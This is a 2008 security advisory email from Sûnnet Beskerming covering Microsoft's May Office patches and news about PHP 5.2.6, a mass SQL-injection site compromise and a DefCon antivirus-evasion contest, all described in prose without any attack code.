Advisory #255 - Microsoft (Multiple), Multiple News

Sûnnet Beskerming Alert List Advisory #255

You are receiving this message because you have subscribed to our  
Information Security Alert Mailing List, or have been selected for a  
specific one-off copy.  If you believe that you are receiving this  
message in error, please contact info@... to resolve the  
error.

Why not upgrade to get same day notification on security threats?  
Details and rates available online -
(http://www.beskerming.com/premium/generic_advisory.html).

Why not go the next step and get delivery tailored just for your  
company?
(http://www.beskerming.com/premium/focussed_advisory.html)


Contents
--------------------------------------------------------------------
1. SECURITY
--------------------------------------------------------------------
1.1 Microsoft (Multiple)
        - Remote Hacker Automatic Control
        - Time Since Discovery - 2 days
=======================================
/*
        - Remote or Local - Can it be achieved through a network or does it  
require physical access?
        - Hacker - The bad guy
        - Manual or Automatic  - Does the vulnerability need to be manually  
performed, or can it be automated?
        - Control, Denial of Service or Data Theft - Will the hacker get  
control of your system / website, will they prevent you from using  
it, or will they steal data.
*/
--------------------------------------------------------------------
2.    NEWS
--------------------------------------------------------------------
2.1 PHP Updates to 5.2.6
2.2 Mass Site Hack Proves no Site is Truly Safe
2.3 DefCon Competition has Antivirus Vendors Complaining
=====================================

1. SECURITY

1.1 Microsoft (Multiple) - Remote Hacker Automatic Control

        -- Products Affected --
        Microsoft Office

        -- Technical Description --
        MS08-026 - Office. Multiple Remote code execution.  Replaces  
MS08-009. Critical
        MS08-027 - Publisher. Remote code execution.  Replaces MS07-037 and  
MS08-012. Critical
        MS08-028 - Jet Database Engine. Remote code execution. Critical
        MS08-029 - Microsoft malware protection engine. Multiple Denial of  
Service. Important

        -- Description --
        Microsoft has provided four patches with the May Security Update  
release, with the first three identified as Critical, and the  
remaining one as Important.  MS06-069 was also re-released to account  
for Windows XP SP3 as a vulnerable product.  The Jet Database Engine  
vulnerabilities (MS08-028) have been actively exploited for some  
time, while the other vulnerabilities have not had any public release  
of attack code.

        -- Recommended Action --
        All users and administrators should apply the updates at the  
earliest opportunity.

        -- Source --
        http://www.microsoft.com/technet/security/bulletin/ms08-may.mspx
        http://www.beskerming.com/premium/patch_pack.html
        http://store.eSellerate.net/s.asp?
s=STR3448907936&Cmd=CATALOG&CategoryID=9811
       
        -- Updates Available --
        http://www.microsoft.com/technet/security/bulletin/ms08-026.mspx
        http://www.microsoft.com/technet/security/bulletin/ms08-027.mspx
        http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx
        http://www.microsoft.com/technet/security/bulletin/ms08-029.mspx

        -- External Tracking Data --
        CVE-ID: CVE-2008-1091 (MS08-026)
        CVE-ID: CVE-2008-1434 (MS08-026)
        CVE-ID: CVE-2008-0119 (MS08-027)
        CVE-ID: CVE-2008-6026 (MS08-028)
        CVE-ID: CVE-2008-1437 (MS08-029)
        CVE-ID: CVE-2008-1438 (MS08-029)

        -- Threat Matrix --
                        U O
        Home User 10 10 (Highly Critical)
        Corporate 10 10 (Highly Critical)


=======================================
/*
Threat Matrix:
        U - User
        O - Operator
        Harmless - 0 ----- 10 - Highly Critical
*/
=======================================

2. NEWS

2.1 PHP Updates to 5.2.6

The PHP Group released version 5.2.6 of the popular scripting  
language earlier this month. While there were more than 100 bugs  
fixed with this update, there were several critical security  
vulnerabilities patched that make updating essential for any  
administrators or users currently using the 5.x branch of PHP (if  
you're still stuck using 4.x or earlier you should really consider  
updating your installation).

Several memory leaks, buffer overflows, safe mode bypasses, and multi-
byte character handling are amongst the issues addressed by this  
update, which is the first one to be released in six months by the  
PHP Group. Although there are probably many more security  
vulnerabilities yet to be found or patched (just see Stefan Esser's  
work, which has been somewhat quiet since the end of last year), the  
significant number of bugs patched is a continuing good sign from a  
project that has come under fire in the past for having a mixed  
approach to the security of their main product.


2.2 Mass Site Hack Proves no Site is Truly Safe

There has been a lot of coverage of a widespread (estimated at more  
than half a million sites) set of web server attacks that have been  
taking place for a number of weeks using an unfortunately-common SQL  
injection opportunity to take control of back end databases, and  
sites themselves. So much concern and confusion has surrounded what  
is going on that Microsoft's Security Response Center have released a  
statement to clarify the nature of the attacks as reported to them.  
Although there has been a new IIS vulnerability disclosed in recent  
weeks, the attacks are only making use of poor site and database  
maintenance practices - using SQL injection to exploit sites.

For site visitors who visit an affected site, JavaScript is used to  
try and download / run malware that then targets a number of commonly  
used technologies in order to gain full control over the system.

It goes to show that input validation is a critical component of the  
security picture for a site and it is a problem that is still not  
being properly addressed by many sites, including a lot that should  
know better.

If anything else is needed to concern site operators, it is research  
from David Litchfield that demonstrates an almost-generic attack  
method against Oracle databases.

In one simple set of attacks, previously trustworthy sites can now no  
longer be considered trustworthy and it is another blow to services  
that tout their ability to mark a site as being 'Hacker Safe' or  
otherwise safe for visiting (like SiteAdvisor).


2.3 DefCon Competition has Antivirus Vendors Complaining

DefCon is known for a range of 'out there' type activities and  
presentations and it looks like this year is going to be no  
different. A contest that is being organised on the sidelines of this  
year's convention is already raising eyebrows and complaints from  
around the Information Security industry.

In a nutshell, the aim of the contest is to successfully modify  
malware samples so that they pass through a number of antivirus  
scanners without detection, while still retaining the malware  
capability. It could be seen as a polymorphism competition - how much  
can you change the code and still retain the same function.

What the contest is seeking to achieve is nothing more than what is  
happening continuously on the Internet, where malware developers are  
continually fine-tuning their software to best avoid detection. It  
should also show up the antivirus tools that are making use of poor  
signature detection mechanisms and those that are using weak  
heuristics to detect previously unknown malware. The big problem for  
the antivirus developers is that it is possible to effectively drive  
a truck through the holes in their systems and it isn't going to take  
much for competitors to bypass most tools. It will be interesting to  
see how the competition organisers set about increasing the  
difficulty of each round.

Antivirus developers are complaining about the competition, though  
most of the complaints sound like the developers are having a hard  
time keeping their technology within spitting distance of the malware  
authors. Even with the complaining, it probably won't take long for  
the competition samples to appear in definition files and in the  
count of malware types being detected. It is strange, though, how  
competitions like CTF, or the recent 0-day competition at CanSecWest,  
do not attract much complaint, but as soon as antivirus or  
antimalware tools are targeted it is too much for people.

It is the latest in a number of interesting competitions where the  
practical attack value of what is being done is greater than in other  
competitions. This contest ranks up with miniscule-XSS competitions  
and archives of XSS / SQL injection vulnerable sites.

=======================================

Sincerely,

Sûnnet Beskerming Team
info@...
Sûnnet Beskerming Pty. Ltd.
Adelaide, Australia
http://www.beskerming.com
Tel: +61 (0) 410 707 444

** Sûnnet Beskerming Pty. Ltd. **

Established in mid 2004, Sûnnet Beskerming Pty. Ltd. is the sister  
company to Jongsma & Jongsma Pty. Ltd., and was formed to develop and  
commercialise the research coming out of Jongsma & Jongsma Pty. Ltd..  
Sûnnet Beskerming Pty. Ltd. is an Information Security specialist  
and, in conjunction with the tools developed by Jongsma & Jongsma  
Pty. Ltd., provides total security solutions and services, from the  
perimeter to internal data stores, including web application security  
and security testing and analysis.
_______________________________________________
Alertmailinglist mailing list
Alertmailinglist@...
http://skiifwrald.com/mailman/listinfo/alertmailinglist_skiifwrald.com